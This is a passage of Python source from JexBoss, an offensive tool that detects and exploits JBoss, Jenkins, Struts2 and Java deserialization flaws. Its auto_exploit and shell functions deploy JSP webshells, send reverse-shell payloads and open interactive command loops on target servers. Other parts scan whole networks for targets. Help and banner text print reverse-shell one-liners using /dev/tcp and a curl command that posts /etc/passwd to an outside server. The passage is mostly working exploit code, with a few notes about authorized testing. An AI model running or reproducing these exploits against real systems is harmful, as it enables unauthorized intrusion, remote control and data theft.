296 | # chek vul for Java Unserializable in Application Parameters
297 | elif vector == 'Application Deserialization':
298 |
299 | r = gl_http_pool.request('GET', url, redirect=False, headers=headers)
300 | if r.status in (301, 302, 303, 307, 308):
301 | cookie = r.getheader('set-cookie')
302 | if cookie is not None: headers['Cookie'] = cookie
303 | r = gl_http_pool.request('GET', url, redirect=True, headers=headers)
304 | # link, obj = _exploits.get_param_value(r.data, gl_args.post_parameter)
305 | obj = _exploits.get_serialized_obj_from_param(str(r.data), gl_args.post_parameter)
306 |
307 | # if no obj serialized, check if there's a html refresh redirect and follow it
308 | if obj is None:
309 | # check if theres a redirect link
310 | link = _exploits.get_html_redirect_link(str(r.data))
311 |
312 | # If it is a redirect link. Follow it
313 | if link is not None:
314 | r = gl_http_pool.request('GET', url + "/" + link, redirect=True, headers=headers)
315 | #link, obj = _exploits.get_param_value(r.data, gl_args.post_parameter)
316 | obj = _exploits.get_serialized_obj_from_param(str(r.data), gl_args.post_parameter)
317 |
318 | # if obj does yet None
319 | if obj is None:
320 | # search for other params that can be exploited
321 | list_params = _exploits.get_list_params_with_serialized_objs(str(r.data))
322 | if len(list_params) > 0:
323 | paths[vector] = 110
324 | print_and_flush(RED + " [ CHECK OTHER PARAMETERS ]" + ENDC)
325 | print_and_flush(RED + "\n * The \"%s\" parameter does not appear to be vulnerable.\n" %gl_args.post_parameter +
326 | " But there are other parameters that it seems to be xD!\n" +ENDC+GREEN+
327 | BOLD+ "\n Try these other parameters: \n" +ENDC)
328 | for p in list_params:
329 | print_and_flush(GREEN + " -H %s" %p+ ENDC)
330 | print ("")
331 | elif obj is not None and obj == 'stateless':
332 | paths[vector] = 100
333 | elif obj is not None:
334 | paths[vector] = 200
335 |
336 | # chek vul for Java Unserializable in viewState
337 | elif vector == 'Servlet Deserialization':
338 |
339 | r = gl_http_pool.request('GET', url, redirect=False, headers=headers)
340 | if r.status in (301, 302, 303, 307, 308):
341 | cookie = r.getheader('set-cookie')
342 | if cookie is not None: headers['Cookie'] = cookie
343 | r = gl_http_pool.request('GET', url, redirect=True, headers=headers)
344 |
345 | if r.getheader('Content-Type') is not None and 'x-java-serialized-object' in r.getheader('Content-Type'):
346 | paths[vector] = 200
347 | else:
348 | paths[vector] = 505
349 |
350 | elif vector == 'Struts2':
351 |
352 | result = _exploits.exploit_struts2_jakarta_multipart(url, 'jexboss', gl_args.cookies)
353 | if result is None or "Could not get command" in str(result) :
354 | paths[vector] = 100
355 | elif 'jexboss' in str(result) and "" not in str(result).lower():
356 | paths[vector] = 200
357 | else:
358 | paths[vector] = 505
359 |
360 | elif vector == 'JMX Tomcat':
361 |
362 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
363 | s.settimeout(7)
364 | host_rmi = url.split(':')[0]
365 | port_rmi = int(url.split(':')[1])
366 | s.connect((host_rmi, port_rmi))
367 | s.send(b"JRMI\x00\x02K")
368 | msg = s.recv(1024)
369 | octets = str(msg[3:]).split(".")
370 | if len(octets) != 4:
371 | paths[vector] = 505
372 | else:
373 | paths[vector] = 200
374 |
375 | # check jboss vectors
376 | elif vector == "JMXInvokerServlet":
377 | # user privided web-console path and checking JMXInvoker...
378 | if "/web-console/Invoker" in url:
379 | paths[vector] = 505
380 | # if the user not provided the path, append the "/invoker/JMXInvokerServlet"
381 | else:
382 |
383 | if not url.endswith(str(paths[vector])) and not url.endswith(str(paths[vector])+"/"):
384 | url_to_check = url + str(paths[vector])
385 | else:
386 | url_to_check = url
387 |
388 | r = gl_http_pool.request('HEAD', url_to_check , redirect=False, headers=headers)
389 | # if head method is not allowed/supported, try GET
390 | if r.status in (405, 406):
391 | r = gl_http_pool.request('GET', url_to_check , redirect=False, headers=headers)
392 |
393 | # if web-console/Invoker or invoker/JMXInvokerServlet
394 | if r.getheader('Content-Type') is not None and 'x-java-serialized-object' in r.getheader('Content-Type'):
395 | paths[vector] = 200
396 | else:
397 | paths[vector] = 505
398 |
399 | elif vector == "web-console":
400 | # user privided JMXInvoker path and checking web-console...
401 | if "/invoker/JMXInvokerServlet" in url:
402 | paths[vector] = 505
403 | # if the user not provided the path, append the "/web-console/..."
404 | else:
405 |
406 | if not url.endswith(str(paths[vector])) and not url.endswith(str(paths[vector]) + "/"):
407 | url_to_check = url + str(paths[vector])
408 | else:
409 | url_to_check = url
410 |
411 | r = gl_http_pool.request('HEAD', url_to_check, redirect=False, headers=headers)
412 | # if head method is not allowed/supported, try GET
413 | if r.status in (405, 406):
414 | r = gl_http_pool.request('GET', url_to_check, redirect=False, headers=headers)
415 |
416 | # if web-console/Invoker or invoker/JMXInvokerServlet
417 | if r.getheader('Content-Type') is not None and 'x-java-serialized-object' in r.getheader('Content-Type'):
418 | paths[vector] = 200
419 | else:
420 | paths[vector] = 505
421 |
422 | # other jboss vector
423 | else:
424 | r = gl_http_pool.request('HEAD', url + str(paths[vector]), redirect=False, headers=headers)
425 | # if head method is not allowed/supported, try GET
426 | if r.status in (405, 406):
427 | r = gl_http_pool.request('GET', url + str(paths[vector]), redirect=False, headers=headers)
428 | # check if the server respond with 200/500 for all requests
429 | if r.status in (200, 500):
430 | r = gl_http_pool.request('GET', url + str(paths[vector])+ '/github.com/joaomatosf/jexboss', redirect=False,headers=headers)
431 |
432 | if r.status == 200:
433 | r.status = 505
434 | else:
435 | r.status = 200
436 |
437 | paths[vector] = r.status
438 |
439 | # ----------------
440 | # Analysis of the results
441 | # ----------------
442 | # check if the proxy do not support running in the same port of the target
443 | if r is not None and r.status == 400 and gl_args.proxy:
444 | if parse_url(gl_args.proxy).port == url_check.port:
445 | print_and_flush(RED + "[ ERROR ]\n * An error occurred because the proxy server is running on the "
446 | "same port as the server port (port %s).\n"
447 | " Please use a different port in the proxy.\n" % url_check.port + ENDC)
448 | logging.critical("Proxy returns 400 Bad Request because is running in the same port as the server")
449 | fatal_error = True
450 | break
451 |
452 | # check if it's false positive
453 | if r is not None and len(r.getheaders()) == 0:
454 | print_and_flush(RED + "[ ERROR ]\n * The server %s is not an HTTP server.\n" % url + ENDC)
455 | logging.error("The server %s is not an HTTP server." % url)
456 | for key in paths: paths[key] = 505
457 | break
458 |
459 | if paths[vector] in (301, 302, 303, 307, 308):
460 | url_redirect = r.get_redirect_location()
461 | print_and_flush(GREEN + " [ REDIRECT ]\n * The server sent a redirect to: %s\n" % url_redirect)
462 | elif paths[vector] == 200 or paths[vector] == 500:
463 | if vector == "admin-console":
464 | print_and_flush(RED + " [ EXPOSED ]" + ENDC)
465 | logging.info("Server %s: EXPOSED" %url)
466 | elif vector == "Jenkins":
467 | print_and_flush(RED + " [ POSSIBLE VULNERABLE ]" + ENDC)
468 | logging.info("Server %s: RUNNING JENKINS" %url)
469 | elif vector == "JMX Tomcat":
470 | print_and_flush(RED + " [ MAYBE VULNERABLE ]" + ENDC)
471 | logging.info("Server %s: RUNNING JENKINS" %url)
472 | else:
473 | print_and_flush(RED + " [ VULNERABLE ]" + ENDC)
474 | logging.info("Server %s: VULNERABLE" % url)
475 | elif paths[vector] == 100:
476 | paths[vector] = 200
477 | print_and_flush(RED + " [ INCONCLUSIVE - NEED TO CHECK ]" + ENDC)
478 | logging.info("Server %s: INCONCLUSIVE - NEED TO CHECK" % url)
479 | elif paths[vector] == 110:
480 | logging.info("Server %s: CHECK OTHERS PARAMETERS" % url)
481 | else:
482 | print_and_flush(GREEN + " [ OK ]")
483 | except Exception as err:
484 | print_and_flush(RED + "\n * An error occurred while connecting to the host %s (%s)\n" % (url, err) + ENDC)
485 | logging.info("An error occurred while connecting to the host %s" % url, exc_info=traceback)
486 | paths[vector] = 505
487 |
488 | if fatal_error:
489 | exit(1)
490 | else:
491 | return paths
492 |
493 |
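def _wait_for_enter():
    """Block until the user presses [ENTER]; works on both Python 2 and 3."""
    if version_info[0] >= 3:
        input()
    else:
        raw_input()


def _reverse_shell_params(allow_gadget_file=False):
    """
    Resolve the reverse-shell listener for a payload, or None if there is nothing to send.

    Returns (host, port) from get_host_port_reverse_params(). Returns None when
    host, port and --cmd are all unset (and, if allow_gadget_file is True,
    --load-gadget is unset too) - the payload would have neither a callback
    target nor a command, so the caller aborts the vector.
    """
    host, port = get_host_port_reverse_params()
    nothing_to_send = host is None and port is None and gl_args.cmd is None
    if allow_gadget_file:
        nothing_to_send = nothing_to_send and gl_args.load_gadget is None
    return None if nothing_to_send else (host, port)


def auto_exploit(url, exploit_type):
    """
    Try to exploit one target through one detection vector.

    :param url: the target URL. For the JBoss servlet vectors a user-supplied
        "/web-console/Invoker" or "/invoker/JMXInvokerServlet" suffix is
        stripped, because the exploit helpers append the path themselves.
    :param exploit_type: the vector name as produced by check_vul(): one of
        "jmx-console", "web-console", "JMXInvokerServlet", "admin-console",
        "Jenkins", "JMX Tomcat", "Application Deserialization",
        "Servlet Deserialization" or "Struts2". (The old docstring listed the
        internal _exploits helper names here, which are not valid values.)
    :return: True when the helper reported success (HTTP 200/500, or 201 for
        a gadget-based JBoss exploit) or an interactive shell session was run;
        False otherwise, including the case where a reverse-shell vector was
        chosen but no listener, --cmd (or --load-gadget) was provided.

    Side effects: prints progress, may block on stdin waiting for [ENTER], and
    without --auto-exploit drops into shell_http() / shell_http_struts() on
    success. Only run against systems you are authorised to test.
    """
    if exploit_type in ("Application Deserialization", "Servlet Deserialization"):
        print_and_flush(GREEN + "\n * Preparing to send exploit to %s. Please wait...\n" % url)
    else:
        print_and_flush(GREEN + "\n * Sending exploit code to %s. Please wait...\n" % url)

    result = 505
    if exploit_type == "jmx-console":
        result = _exploits.exploit_jmx_console_file_repository(url)
        if result not in (200, 500):
            result = _exploits.exploit_jmx_console_main_deploy(url)

    elif exploit_type == "web-console":
        # strip the path if the user provided it; the helpers append it
        if url.endswith("/web-console/Invoker") or url.endswith("/web-console/Invoker/"):
            url = url.replace("/web-console/Invoker", "")

        result = _exploits.exploit_web_console_invoker(url)
        if result == 404:
            params = _reverse_shell_params()
            if params is None:
                return False
            host, port = params
            result = _exploits.exploit_servlet_deserialization(url + "/web-console/Invoker", host=host, port=port,
                                                               cmd=gl_args.cmd, is_win=gl_args.windows, gadget=gl_args.gadget,
                                                               gadget_file=gl_args.load_gadget)

    elif exploit_type == "JMXInvokerServlet":
        # strip the path if the user provided it; the helpers append it
        if url.endswith("/invoker/JMXInvokerServlet") or url.endswith("/invoker/JMXInvokerServlet/"):
            url = url.replace("/invoker/JMXInvokerServlet", "")

        result = _exploits.exploit_jmx_invoker_file_repository(url, 0)
        if result not in (200, 500):
            result = _exploits.exploit_jmx_invoker_file_repository(url, 1)
            if result == 404:
                params = _reverse_shell_params()
                if params is None:
                    return False
                host, port = params
                result = _exploits.exploit_servlet_deserialization(url + "/invoker/JMXInvokerServlet", host=host, port=port,
                                                                   cmd=gl_args.cmd, is_win=gl_args.windows, gadget=gl_args.gadget,
                                                                   gadget_file=gl_args.load_gadget)

    elif exploit_type == "admin-console":
        result = _exploits.exploit_admin_console(url, gl_args.jboss_login)

    elif exploit_type == "Jenkins":
        params = _reverse_shell_params()
        if params is None:
            return False
        host, port = params
        result = _exploits.exploit_jenkins(url, host=host, port=port, cmd=gl_args.cmd, is_win=gl_args.windows,
                                           gadget=gl_args.gadget, show_payload=gl_args.show_payload)

    elif exploit_type == "JMX Tomcat":
        params = _reverse_shell_params()
        if params is None:
            return False
        host, port = params
        result = _exploits.exploit_jrmi(url, host=host, port=port, cmd=gl_args.cmd, is_win=gl_args.windows)

    elif exploit_type == "Application Deserialization":
        params = _reverse_shell_params(allow_gadget_file=True)
        if params is None:
            return False
        host, port = params
        result = _exploits.exploit_application_deserialization(url, host=host, port=port, cmd=gl_args.cmd, is_win=gl_args.windows,
                                                               param=gl_args.post_parameter, force=gl_args.force,
                                                               gadget_type=gl_args.gadget, show_payload=gl_args.show_payload,
                                                               gadget_file=gl_args.load_gadget)

    elif exploit_type == "Servlet Deserialization":
        params = _reverse_shell_params(allow_gadget_file=True)
        if params is None:
            return False
        host, port = params
        result = _exploits.exploit_servlet_deserialization(url, host=host, port=port, cmd=gl_args.cmd, is_win=gl_args.windows,
                                                           gadget=gl_args.gadget, gadget_file=gl_args.load_gadget)

    elif exploit_type == "Struts2":
        # check_vul() already ran a test command through this vector, so it is
        # treated as exploited and the command loop is opened directly.
        result = 200

    # 200/500 mean deployed; 201 is a JBoss vector exploited through a gadget
    if result in (200, 500, 201):
        if gl_args.auto_exploit:
            print_and_flush(GREEN + " * Successfully deployed/sended code via vector %s\n *** Run JexBoss in Standalone mode "
                            "to open command shell. ***" % (exploit_type) + ENDC)
            return True

        # payload-only vectors have no webshell to attach to: just tell the user to check the listener
        if exploit_type in ("Application Deserialization", "Jenkins", "JMX Tomcat", "Servlet Deserialization") or result == 201:
            print_and_flush(BLUE + " * The exploit code was successfully sent. Check if you received the reverse shell\n"
                            " connection on your server or if your command was executed. \n" + ENDC +
                            " Type [ENTER] to continue...\n")
            _wait_for_enter()
            return True

        if exploit_type == 'Struts2':
            shell_http_struts(url)
        else:
            print_and_flush(GREEN + " * Successfully deployed code! Starting command shell. Please wait...\n" + ENDC)
            shell_http(url, exploit_type)
        return True

    # not exploited: explain, wait for [ENTER]
    if exploit_type == 'admin-console':
        print_and_flush(GREEN + "\n * You can still try to exploit deserialization vulnerabilitie in ViewState!\n" +
                        " Try this: python jexboss.py -u %s/admin-console/login.seam --app-unserialize\n" % url +
                        " Type [ENTER] to continue...\n" + ENDC)
    else:
        print_and_flush(RED + "\n * Could not exploit the flaw automatically. Exploitation requires manual analysis...\n" +
                        " Type [ENTER] to continue...\n" + ENDC)
        logging.error("Could not exploit the server %s automatically. HTTP Code: %s" % (url, result))
    _wait_for_enter()
    return False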
626 |
627 |
def ask_for_reverse_host_and_port():
    """
    Prompt interactively for the listener used by the reverse-shell payloads.

    When stdout is not a TTY (e.g. git-bash on Windows) the prompt is written
    with print_and_flush, because input()'s own prompt would not be shown.
    No validation is performed; both answers are returned as lower-cased strings.
    """
    print_and_flush(GREEN + " * Please enter the IP address and tcp PORT of your listening server for try to get a REVERSE SHELL.\n"
                    " OBS: You can also use the --cmd \"command\" to send specific commands to run on the server." + NORMAL)

    answers = []
    for prompt in (" IP Address (RHOST): ", " Port (RPORT): "):
        if not sys.stdout.isatty():
            print_and_flush(prompt, same_line=True)
            raw = input() if version_info[0] >= 3 else raw_input()
        else:
            raw = input(prompt) if version_info[0] >= 3 else raw_input(prompt)
        answers.append(raw.lower())

    print("")
    rhost, rport = answers
    return str(rhost), str(rport)
644 |
645 |
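def get_host_port_reverse_params():
    """
    Work out the (host, port) pair for a reverse shell from the CLI options.

    Resolution order:
      * --reverse-host given: on Windows targets reverse shells are not
        supported, so warn, wait for [ENTER] and return (None, None);
        otherwise split "RHOST:RPORT", or prompt if it is not of that form.
      * neither --cmd nor --load-gadget given: prompt interactively.
      * otherwise: (None, None) - the payload runs --cmd / the supplied gadget
        instead of connecting back.

    :return: a tuple of two strings, or (None, None). The port is not validated
        here; the split on ":" also means a bare IPv6 literal will fall back to
        the interactive prompt.
    """
    if gl_args.reverse_host:
        if gl_args.windows:
            # Every other message in this module goes through the module-level
            # print_and_flush; the previous `jexboss.print_and_flush` spelling
            # only resolves if the module imports itself (not visible here).
            print_and_flush(RED + "\n * WINDOWS Systems still do not support reverse shell.\n"
                            " Use option --cmd instead of --reverse-shell...\n" + ENDC +
                            " Type [ENTER] to continue...\n")
            # wait while enter is typed
            if version_info[0] >= 3:
                input()
            else:
                raw_input()
            return None, None

        tokens = gl_args.reverse_host.split(":")
        if len(tokens) != 2:
            return ask_for_reverse_host_and_port()
        return tokens[0], tokens[1]

    # no reverse host: without a command or a gadget file there is nothing
    # else the payload could do, so ask for a listener
    if gl_args.cmd is None and gl_args.load_gadget is None:
        return ask_for_reverse_host_and_port()

    return None, None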
672 |
673 |
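def _print_struts_output(resp, same_line=False):
    """
    Print the text returned by exploit_struts2_jakarta_multipart().

    check_vul() shows that helper can return None; the original code called
    .replace() on it unconditionally and crashed the shell loop in that case.
    """
    if resp is None:
        print_and_flush(RED + " * No output was returned for the command. Try again later..." + ENDC)
        return
    print_and_flush(str(resp).replace('\\n', '\n'), same_line=same_line)


def shell_http_struts(url):
    """
    Interactive command loop over the Struts2 Jakarta Multipart vector (CVE-2017-5638).

    :param url: the Struts action URL that check_vul() reported as exploitable

    Every command is sent as a fresh exploit request through
    _exploits.exploit_struts2_jakarta_multipart() together with the
    --cookies value; there is no persistent shell on the target. Type "exit"
    to leave the loop. Only use against systems you are authorised to test.
    """
    print_and_flush("# ----------------------------------------- #\n")
    print_and_flush(GREEN + BOLD + " * For a Reverse Shell (like meterpreter =]), type sometime like: \n\n"
                    "\n" + ENDC +
                    " Shell>/bin/bash -i > /dev/tcp/192.168.0.10/4444 0>&1 2>&1\n"
                    " \n" + GREEN +
                    " And so on... =]\n" + ENDC
                    )
    print_and_flush("# ----------------------------------------- #\n")

    resp = _exploits.exploit_struts2_jakarta_multipart(url, 'whoami', gl_args.cookies)
    _print_struts_output(resp, same_line=True)
    logging.info("Server %s exploited!" % url)

    while True:
        print_and_flush(BLUE + "[Type commands or \"exit\" to finish]" + ENDC)

        if not sys.stdout.isatty():
            print_and_flush("Shell> ", same_line=True)
            cmd = input() if version_info[0] >= 3 else raw_input()
        else:
            cmd = input("Shell> ") if version_info[0] >= 3 else raw_input("Shell> ")

        if cmd == "exit":
            break

        resp = _exploits.exploit_struts2_jakarta_multipart(url, cmd, gl_args.cookies)
        _print_struts_output(resp)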
708 |
709 |
# NOTE: a read timeout while talking to the webshell is caught inside shell_http
# (see the try/except around each gl_http_pool.request) instead of aborting the session.
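def shell_http(url, shell_type):
    """
    Drive the JSP webshell deployed by a JBoss exploit as an interactive command loop.

    :param url: base URL of the exploited server
    :param shell_type: the vector that deployed the shell. "jmx-console",
        "web-console" and "admin-console" share /jexws4/jexws4.jsp;
        "JMXInvokerServlet" uses /jexinv4/jexinv4.jsp.
    :raises ValueError: for any other shell_type (previously this surfaced as
        an UnboundLocalError on `path`)

    Commands travel as the `ppp` GET parameter; the command output is taken
    from inside the <pre> element of the response. Two caveats a tester should
    know: (1) unless --disable-check-updates (-D) was given, the
    `no-check-updates` header is not sent and the deployed webshell performs
    its own update check against an external host (see the -D option help);
    the header is only switched on afterwards if the initial probes fail.
    (2) Nothing here removes the webshell from the target when the loop ends.
    """
    headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               "Connection": "keep-alive",
               "User-Agent": get_random_user_agent()}

    if gl_args.disable_check_updates:
        headers['no-check-updates'] = 'true'

    if shell_type in ("jmx-console", "web-console", "admin-console"):
        path = '/jexws4/jexws4.jsp?'
    elif shell_type == "JMXInvokerServlet":
        path = '/jexinv4/jexinv4.jsp?'
    else:
        raise ValueError("shell_http: unsupported shell_type %r" % (shell_type,))

    # warm-up request followed by a fixed wait before the first probe
    # (the original does not say why 7 s; presumably JSP compile time)
    gl_http_pool.request('GET', url + path, redirect=False, headers=headers)
    sleep(7)

    print_and_flush("# ----------------------------------------- # LOL # ----------------------------------------- #\n")
    print_and_flush(RED + " * " + url + ": \n" + ENDC)
    print_and_flush("# ----------------------------------------- #\n")
    print_and_flush(GREEN + BOLD + " * For a Reverse Shell (like meterpreter =]), type the command: \n\n"
                    " jexremote=YOUR_IP:YOUR_PORT\n\n" + ENDC + GREEN +
                    " Example:\n" + ENDC +
                    " Shell>jexremote=192.168.0.10:4444\n"
                    "\n" + GREEN +
                    " Or use other techniques of your choice, like:\n" + ENDC +
                    " Shell>/bin/bash -i > /dev/tcp/192.168.0.10/4444 0>&1 2>&1\n"
                    " \n" + GREEN +
                    " And so on... =]\n" + ENDC
                    )
    print_and_flush("# ----------------------------------------- #\n")

    # initial fingerprint of the host; a failure is interpreted as IPS interference
    resp = ""
    for probe in ['uname -a', 'cat /etc/issue', 'id']:
        query = urlencode({"ppp": probe})
        try:
            r = gl_http_pool.request('GET', url + path + query, redirect=False, headers=headers)
            resp += " " + str(r.data).split(">")[1]
        except Exception:
            # narrowed from a bare except so Ctrl-C still interrupts the loop
            print_and_flush(RED + " * Apparently an IPS is blocking some requests. Check for updates will be disabled...\n\n" + ENDC)
            logging.warning("Disabling checking for updates.", exc_info=traceback)
            headers['no-check-updates'] = 'true'

    print_and_flush(resp.replace('\\n', '\n'), same_line=True)
    logging.info("Server %s exploited!" % url)

    while True:
        print_and_flush(BLUE + "[Type commands or \"exit\" to finish]" + ENDC)

        if not sys.stdout.isatty():
            print_and_flush("Shell> ", same_line=True)
            cmd = input() if version_info[0] >= 3 else raw_input()
        else:
            cmd = input("Shell> ") if version_info[0] >= 3 else raw_input("Shell> ")

        if cmd == "exit":
            break

        query = urlencode({"ppp": cmd})
        try:
            r = gl_http_pool.request('GET', url + path + query, redirect=False, headers=headers)
        except Exception:
            print_and_flush(RED + " * Error contacting the command shell. Try again and see logs for details ...")
            logging.error("Error contacting the command shell", exc_info=traceback)
            continue

        if r.status == 404:
            print_and_flush(RED + " * Error contacting the command shell. Try again later...")
            continue

        stdout = ""
        try:
            stdout = str(r.data).split("pre>")[1]
        except IndexError:
            print_and_flush(RED + " * Error contacting the command shell. Try again later...")

        if stdout.count("An exception occurred processing JSP page") == 1:
            # report the command as typed rather than its URL-encoded form
            print_and_flush(RED + " * Error executing command \"%s\". " % cmd + ENDC)
        else:
            print_and_flush(stdout.replace('\\n', '\n'))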
794 |
795 |
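def clear():
    """
    Clear the terminal.

    `name` is os.name: 'posix' runs `clear`; the Windows family ('ce', 'nt',
    'dos') runs `cls`; any other platform is left untouched. The previous
    version compared the string `name` to the tuple ('ce', 'nt', 'dos') with
    ==, which is never true, so the screen was never cleared on Windows.
    """
    if name == 'posix':
        system('clear')
    elif name in ('ce', 'nt', 'dos'):
        system('cls')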
804 |
805 |
def banner():
    """
    Clear the screen and print the JexBoss banner box followed by the version line.
    """
    clear()
    box_lines = (
        "\n * --- JexBoss: Jboss verify and EXploitation Tool --- *\n",
        " | * And others Java Deserialization Vulnerabilities * | \n",
        " | |\n",
        " | @author: João Filho Matos Figueiredo |\n",
        " | @contact: joaomatosf@gmail.com |\n",
        " | |\n",
        " | @update: https://github.com/joaomatosf/jexboss |\n",
        " #______________________________________________________#\n",
    )
    print_and_flush(RED1 + "".join(box_lines))
    print_and_flush(RED1 + " @version: %s" % __version__)
    print_and_flush(ENDC)
821 |
822 |
def help_usage():
    """
    Build the coloured "Examples" section embedded in the argparse description.

    BOLD/BLUE/GREEN/ENDC are the module's ANSI escape constants; the pieces
    are assembled in order and returned as one string.
    """
    parts = [
        BOLD, BLUE, " Examples: [for more options, type python jexboss.py -h]\n", ENDC,
        BLUE, "\n For simple usage, you must provide the host name or IP address you\n"
              " want to test [-host or -u]:\n",
        GREEN, "\n $ python jexboss.py -u https://site.com.br",

        BLUE, "\n\n For Java Deserialization Vulnerabilities in HTTP POST parameters. \n"
              " This will ask for an IP address and port to try to get a reverse shell:\n",
        GREEN, "\n $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize",

        BLUE, "\n\n For Java Deserialization Vulnerabilities in a custom HTTP parameter and \n"
              " to send a custom command to be executed on the exploited server:\n",
        GREEN, "\n $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize\n"
               " -H parameter_name --cmd 'curl -d@/etc/passwd http://your_server'",

        BLUE, "\n\n For Java Deserialization Vulnerabilities in a Servlet (like Invoker):\n",
        GREEN, "\n $ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize\n",

        BLUE, "\n\n To test Java Deserialization Vulnerabilities with DNS Lookup:\n",
        GREEN, "\n $ python jexboss.py -u http://vulnerable_java_app/path --gadget dns --dns test.yourdomain.com",

        BLUE, "\n\n For Jenkins CLI Deserialization Vulnerabilitie:\n",
        GREEN, "\n $ python jexboss.py -u http://vulnerable_java_app/jenkins --jenkins",

        BLUE, "\n\n For Apache Struts2 Vulnerabilities (CVE-2017-5638):\n",
        GREEN, "\n $ python jexboss.py -u http://vulnerable_java_app/path.action --struts2\n",

        BLUE, "\n\n For auto scan mode, you must provide the network in CIDR format, "
              "\n list of ports and filename for store results:\n",
        GREEN, "\n $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 \n"
               " -results report_auto_scan.log",

        BLUE, "\n\n For file scan mode, you must provide the filename with host list "
              "\n to be scanned (one host per line) and filename for store results:\n",
        GREEN, "\n $ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log\n",
        ENDC,
    ]
    return "".join(parts)
859 |
860 |
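def network_args(string):
    """
    argparse `type=` callback for the -network option.

    :param string: a network in CIDR notation, e.g. "192.168.0.0/24"
    :return: an ipaddress.IPv4Network / IPv6Network. ipaddress is used in its
        default strict mode, as before, so an address with host bits set
        (e.g. "192.168.0.1/24") is rejected.
    :raises argparse.ArgumentTypeError: when the value is not a valid network;
        the rejection is also written to the log.

    Only ValueError is caught: the former bare `except:` also swallowed
    KeyboardInterrupt and any programming error and reported them as a bad
    CIDR string.
    """
    try:
        if version_info[0] >= 3:
            return ipaddress.ip_network(string)
        # Python 2: the backported ipaddress module requires a unicode object
        return ipaddress.ip_network(unicode(string))
    except ValueError:
        msg = "%s is not a network address in CIDR format." % string
        logging.error(msg)
        raise argparse.ArgumentTypeError(msg)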
872 |
873 |
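def _ask_yes_no(prompt):
    """Show *prompt* (via print_and_flush when stdout is not a TTY) and return the lower-cased answer."""
    if not sys.stdout.isatty():
        print_and_flush(prompt, same_line=True)
        answer = input() if version_info[0] >= 3 else raw_input()
    else:
        answer = input(prompt) if version_info[0] >= 3 else raw_input(prompt)
    return answer.lower()


def _maybe_self_update():
    """
    Offer the client self-update unless -D (--disable-check-updates) was given.

    Any answer other than the literal "no" is taken as consent. After an update
    attempt the process exits (0 on success, 1 on failure), as before. Note that
    the check itself is an outbound request to the update host named in the
    -D option help.
    """
    if gl_args.disable_check_updates:
        return
    if not _updates.check_updates():
        return

    print_and_flush(BLUE + BOLD + "\n\n * An update is available and is recommended update before continuing.\n" +
                    " Do you want to update now?")
    pick = _ask_yes_no(" YES/no? ")
    print_and_flush(ENDC)
    if pick != "no":
        if _updates.auto_update():
            print_and_flush(GREEN + BOLD + "\n * The JexBoss has been successfully updated. Please run again to enjoy the updates.\n" + ENDC)
            exit(0)
        print_and_flush(RED + BOLD + "\n\n * An error occurred while updating the JexBoss. Please try again..\n" + ENDC)
        exit(1)


def _exploit_standalone(url, vector):
    """Standalone mode: exploit *vector* on *url*, asking for confirmation unless --auto-exploit."""
    if gl_args.auto_exploit:
        auto_exploit(url, vector)
        return

    if vector == "Application Deserialization":
        msg_confirm = " If successful, this operation will provide a reverse shell. You must enter the\n" \
                      " IP address and Port of your listening server.\n"
    else:
        msg_confirm = " If successful, this operation will provide a simple command shell to execute \n" \
                      " commands on the server..\n"

    print_and_flush(BLUE + "\n\n * Do you want to try to run an automated exploitation via \"" +
                    BOLD + vector + NORMAL + "\" ?\n" +
                    msg_confirm +
                    RED + " Continue only if you have permission!" + ENDC)
    # default is NO: only the literal "yes" proceeds
    if _ask_yes_no(" yes/NO? ") == "yes":
        auto_exploit(url, vector)


def _scan_target(url, file_results):
    """
    Scan mode: run check_vul() on *url* and record every 200/500 vector in *file_results*.

    With --auto-exploit each such vector is exploited immediately and the
    outcome written; otherwise it is only recorded as possibly vulnerable.
    Returns True when at least one vector came back 200/500.
    """
    found = False
    results = check_vul(url)
    for key in results:
        if results[key] not in (200, 500):
            continue
        found = True
        if gl_args.auto_exploit:
            if auto_exploit(url, key):
                file_results.write("{0}:\t[EXPLOITED VIA {1}]\n".format(url, key))
            else:
                file_results.write("{0}:\t[FAILED TO EXPLOITED VIA {1}]\n".format(url, key))
        else:
            file_results.write("{0}:\t[POSSIBLY VULNERABLE TO {1}]\n".format(url, key))
    file_results.flush()
    return found


def _run_auto_scan():
    """
    Auto-scan mode: probe every host of -network on every entry of -ports.

    The report goes to -results; the file is now closed through a context
    manager even if a target raises. Returns whether anything was found.
    """
    found = False
    with open(gl_args.results, 'w') as file_results:
        file_results.write("JexBoss Scan Mode Report\n\n")
        for ip in gl_args.network.hosts():
            if gl_interrupted:
                break
            for port in gl_args.ports.split(","):
                if check_connectivity(ip, port):
                    url = "{0}:{1}".format(ip, port)
                    found = _scan_target(url, file_results) or found
                else:
                    print_and_flush(RED + "\n * Host %s:%s does not respond." % (ip, port) + ENDC)
    return found


def _run_file_scan():
    """
    File-scan mode: one URL per line of -file, report to -out.

    Blank lines are skipped (previously they were parsed as an empty URL).
    Connectivity is probed on the URL's explicit port; without one, 443 is used
    for https and 80 otherwise - the original probed port 80 for every URL
    lacking a port, so https targets without ":443" were reported as not
    responding. Both files are closed via context managers (the input file was
    never closed before). Returns whether anything was found.
    """
    found = False
    with open(gl_args.out, 'w') as file_results, open(gl_args.file, 'r') as file_input:
        file_results.write("JexBoss Scan Mode Report\n\n")
        for url in file_input:
            if gl_interrupted:
                break
            url = url.strip()
            if not url:
                continue
            # parse_url (urllib3) yields (scheme, auth, host, port, path, query, fragment)
            parsed = parse_url(url)
            ip = str(parsed[2])
            if parsed[3] is not None:
                port = parsed[3]
            else:
                port = 443 if (parsed[0] or '').lower() == 'https' else 80
            if check_connectivity(ip, port):
                found = _scan_target(url, file_results) or found
            else:
                print_and_flush(RED + "\n * Host %s:%s does not respond." % (ip, port) + ENDC)
    return found


def _print_summary(vulnerables):
    """Print the closing report: hardening advice after a hit, a reassurance otherwise, then the info/donate footer."""
    if vulnerables:
        banner()
        print_and_flush(RED + BOLD + " Results: potentially compromised server!" + ENDC)
        if gl_args.mode == 'file-scan':
            print_and_flush(RED + BOLD + " ** Check more information on file {0} **".format(gl_args.out) + ENDC)
        elif gl_args.mode == 'auto-scan':
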